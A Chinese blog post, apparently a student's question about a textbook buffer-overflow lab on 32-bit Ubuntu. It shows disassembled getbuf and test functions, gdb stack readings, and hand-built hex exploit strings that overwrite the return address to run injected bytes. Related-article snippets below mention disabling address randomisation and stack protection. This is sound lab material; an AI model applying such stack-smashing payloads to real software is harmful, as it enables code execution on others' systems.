关于缓冲区攻击溢出问题,ubuntu

最新推荐文章于 2021-11-13 14:38:31 发布
最新推荐文章于 2021-11-13 14:38:31 发布
阅读量243 收藏
点赞数 1
分类专栏: 关于缓冲区攻击溢出问题,ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nash01/article/details/84059445
版权
关于缓冲区攻击溢出问题,ubuntu
2011-11-04 00:29


080484c0 <getbuf>:
80484c0: 55 push %ebp
80484c1: 89 e5 mov %esp,%ebp
80484c3: 8d 45 e8 lea -0x18(%ebp),%eax
80484c6: 83 ec 28 sub $0x28,%esp
80484c9: 89 04 24 mov %eax,(%esp)
80484cc: e8 5f ff ff ff call 8048430 <getxs>
80484d1: 89 ec mov %ebp,%esp
80484d3: b8 01 00 00 00 mov $0x1,%eax
80484d8: 5d pop %ebp
80484d9: c3 ret
80484da: 8d b6 00 00 00 00 lea 0x0(%esi),%esi

080484e0 <test>:
80484e0: 55 push %ebp
80484e1: 89 e5 mov %esp,%ebp
80484e3: 83 ec 08 sub $0x8,%esp
80484e6: c7 04 24 04 86 04 08 movl $0x8048604,(%esp)
80484ed: e8 76 fe ff ff call 8048368 <printf@plt>
80484f2: e8 c9 ff ff ff call 80484c0 <getbuf>
80484f7: 89 44 24 04 mov %eax,0x4(%esp)
80484fb: c7 04 24 15 86 04 08 movl $0x8048615,(%esp)
8048502: e8 61 fe ff ff call 8048368 <printf@plt>
8048507: 89 ec mov %ebp,%esp
8048509: 5d pop %ebp
804850a: c3 ret
804850b: 90 nop
804850c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi

gdb为:
(gdb) x/w $ebp
0xbfffefe8: 0xbfffeff8
(gdb) x/w ($ebp+4)
0xbfffefec: 0x080484f7
(gdb) x/w ($ebp-4)
0xbfffefe4: 0x0028bff4
(gdb) x/w ($ebp-0x18)
0xbfffefd0: 0xbfffeff8
(gdb) x/w ($ebp-24)
0xbfffefd0: 0xbfffeff8
所以输入数据应该为:
b8 ef be ad de 68 f7 84 04 08 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 ef ff bf d0 ef ff bf

改为下面这样也是不行啊
b8 ef be ad de 68 f7 84 04 08 c3 00 00 00 00 00 00 00 00 00 f4 bf 28 00 f8 ef ff bf d0 ef ff bf
攻击代码地址为:d0 ef ff bf
是因为这句 <getbuf>
80484c3: 8d 45 e8 lea -0x18(%ebp),%eax
她分配了24个字节空间,所以攻击代码地址有下面的命令得到,
(gdb) x/w ($ebp-24)
0xbfffefd0: 0xbfffeff8

由于为buf分配了24个字节的空间,所以在我的输入后面补了好多的00,一直补到24个字节,这段代码好象没有gs验证码问题(从汇编代码中可以看到)

我也是在ubuntu下工作的,用的gcc版本为3.*
nash01
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于Ubuntu16.04的缓冲区溢出实验进阶版:Return-to-libc实验
shshuahw的博客
08-09 678
这个实验是缓冲区溢出实验的进阶版,目的是攻破不可执行栈机制 经典的缓冲区溢出,存放恶意代码的位置在栈帧中,由于不可执行栈机制即使return到了恶意代码的正确位置,由于栈是不可执行的,恶意代码仍然无法被正确执行 如果将返回地址改成c库的system函数所在位置,就可以通过system函数执行自己想执行的恶意代码 本来这个实验还有execve版本的,由于本人太菜就没做了。。。 一.环境准备 1.关闭防御措施 关闭地址随机化 sudo sysctl -w kernel.randomize_va_space=0
基于SeedUbuntu16.04的缓冲区溢出实验
shshuahw的博客
08-09 958
溢出攻击实验 57119104 苏上峰 一.关闭防御措施 1.关闭地址随机化 在终端输入以下指令,关闭地址随机化,简化实验 sudo sysctl -w kernel.randomize_va_space=0 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pGSotDs5-1628162094726)(1.png)] 2.关闭StackGuard防御机制 在编译c文件时加入以下参数 gcc -fno-stack-protector example.c #-fno-
Ubuntu下缓冲器溢出攻击实验(可以看看问题分析)
weixin_33713350的博客
02-23 303
缓冲器溢出攻击实验题目: 下边的代码摘自《黑客攻防技术宝典——系统实战篇(第 2 版)》2.5 节,攻击该代码,获得root 权限,实现相应的效果。 1 int main(int argc, char *argv[]) 2 { 3 char little_array[512]; 4 if(argc>1) 5 strcpy(little_array,argv[1]); ...
Ubuntu缓冲区溢出实验注意事项
依然静谧的专栏
10-08 1808
在《网络渗透技术》这本书内,第二章中j
详解缓冲区溢出攻击(超级详细)
南七行者的博客
12-02 1万+
打印寄存器的值 AT&T汇编中,命令中可以指定操作范围,如pushb是将一个byte压栈,而pushw就是将一个word压栈,同样pushl就是压栈long(也就是双字)。
缓冲区溢出实验指导书Ubuntu版英文
05-22
缓冲区溢出实验指导书Ubuntu版,英文更加利于理解
实验五 缓冲区溢出实验1
08-08
"实验五 缓冲区溢出实验1" 缓冲区溢出是一种常见的安全漏洞,发生在程序尝试向预先分配的固定大小缓冲区写入数据超出边界时。这种脆弱点能被恶意用户利用来改变程序的控制流程,导致恶意代码的执行。本实验的目的是...
东南大学网络空间安全实验基础——缓冲区溢出漏洞实验
07-07
东南大学网络空间安全实验基础——缓冲区溢出漏洞实验 该实验报告的主要目的是...该实验报告展示了缓冲区溢出漏洞的攻击过程和防御措施,并回答了一些相关的问题,帮助我们更好地理解缓冲区溢出漏洞的原理和防御方法。
Security-Exercises:缓冲区溢出开发示例
05-18
[带有gets功能的缓冲区溢出] Ubuntu 16.04,64位操作系统概述什么是缓冲区溢出? 为什么有问题缓冲区溢出很快就是一个异常,程序在将数据写入缓冲区时会超出缓冲区边界。 也就是说,缓冲区是按固定大小创建的,...
网络缓冲区溢出强敏2010117201.pdf
10-01
Ubuntu环境下,由于GCC的堆栈保护机制,进行缓冲区溢出实验前需要关闭某些安全特性。通过`objdump -d`命令查看程序的反汇编代码,可以分析函数调用和内存布局。例如,`getbuf()`函数调用了`Gets()`函数,攻击者...
linux下的缓冲区溢出攻击技术
06-14
Linux下的缓冲区溢出攻击技术研究,很好的说是论文,对研究缓冲区溢出攻击有很大的帮助。
Ubuntu32位缓冲区溢出示例
weixin_42582241的博客
11-13 1552
实验准备 Unbuntu 16.04 32位 实验一 “example.c”代码: 将“example.c”文件复制至“Home”目录下。 “Ctrl”+“Alt”+“T”调出命令行。 在命令行中输入代码: gcc -o example example.c 将“example.c”编译为可执行文件“example”: 运行可执行文件“example”: ./example 通过对比“buf”输出可得知,此时“buf02”发生了缓冲区溢出。 实验二 ...
缓冲区溢出攻击实验(一)
Venscor技术养成之路
11-18 1万+
本周心情异常不好。无聊之余,想弄一下缓冲区溢出实验,之前一直听说这个,也没有亲自动手 做一下,发现真正弄起来的时候还是没那么简单的,其实学到的东西还是不少的。特此记下学习的过程。 一、基础知识 这一部分主要是关于程序内存布局相关的知识,也涉及少量at&t汇编、gdb调试、gcc编译的知识。再次说明本人 非科班出生,所以在有些问题上要比科班出身的要纠结得多,但职业生涯还长,只要
缓冲区溢出攻击实验
热门推荐
blackturtle的博客
05-26 2万+
又一个计系系统的实验。
linux缓存区溢出攻击,Ubuntu 9.10环境下缓存区溢出攻击实验
weixin_29488835的博客
05-14 208
环境:Ubuntu 9.10 kernel 2.6.31 gcc版本:4.4.1这个是csapp 《深入理解计算机系统》的一道题,直接在原程序运行的时候实现缓存区溢出攻击已经不可能实现了,除非你是用的版本很低的内核和gcc,如gcc 3.4.3。先是王珑珑同学做这道题,我也跟着做了下,花了挺长时间,这期间很感谢王珑珑同学的耐心讲解,thanks~~~原题如下:/* Bomb program ...
缓冲区溢出的两种方式
weixin_34306676的博客
07-19 152
两种覆盖方式:①用任意字符覆盖缓冲区ebp,eip覆盖成“jmp esp”的地址,而后跟shellcode,这中方式适合于比较小的缓冲区和shellcode, 过长的shellcode将失败。②缓冲区ebp由若干个“NOP”指令+shellcode+任意字符覆盖,eip指向缓冲区的某个NOP指令的所在位置。这适合与比较大的缓冲 区和shellcode,但shellcode的大小不能大于缓冲...
ICS计算机系统实验--bomblab
Luobuda的博客
12-02 5524
实验内容及操作步骤: 实验步骤 1.实验题目分析和准备 首先分析bomb.c的C语言代码,我们可以得知本实验共分为六个部分外加一个隐藏关卡,每一部分都要求输入一个字符串,如果输入的字符串不正确则会触发炸弹爆炸实验失败,因此本实验的主要目标就是找到这几个合法的字符串,但是我们会发现无法直接阅读C语言的函数,不能从C语言代码中获得信息。但是题目中还有一个可执行文件,因此我们能想到可以反汇编可执行文件从反汇编出的汇编代码中获得操作的信息从而解决问题。 本实验在linux环境下进行,方便使用用gdb调试方法进
缓冲区溢出攻击
weixin_43567129的博客
02-06 4373
缓冲区溢出(buffer-overflow)是一种非常普遍、同时非常危险的漏洞,在各种操作系统、应用软件中广泛存在。缓冲区溢出攻击是利用缓冲区溢出漏洞所进行的攻击,轻则可以导致程序失败、系统关机等,重则可以利用它执行非授权指令,甚至获取系统特权,从而进行其它的非法操作。缓冲区攻击有栈溢出、堆溢出、格式化字符串漏洞、整形变量溢出等。本文将主要介绍堆栈溢出攻击,并实现对一个ubuntu 16.04系统的简单的栈攻击,获取其root权限。 实验平台 操作系统:SEED Ubuntu16.04 VM (32-bit
Ubuntu20有什么方法防止缓冲区溢出
最新发布
06-11
Ubuntu 20.04可以通过以下方法来防止缓冲区溢出: 1. 使用编译器选项 `-fstack-protector-strong` 开启堆栈保护,这样可以检测到缓冲区溢出并提前终止程序。 2. 使用编译器选项 `-D_FORTIFY_SOURCE=2` 开启强化的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值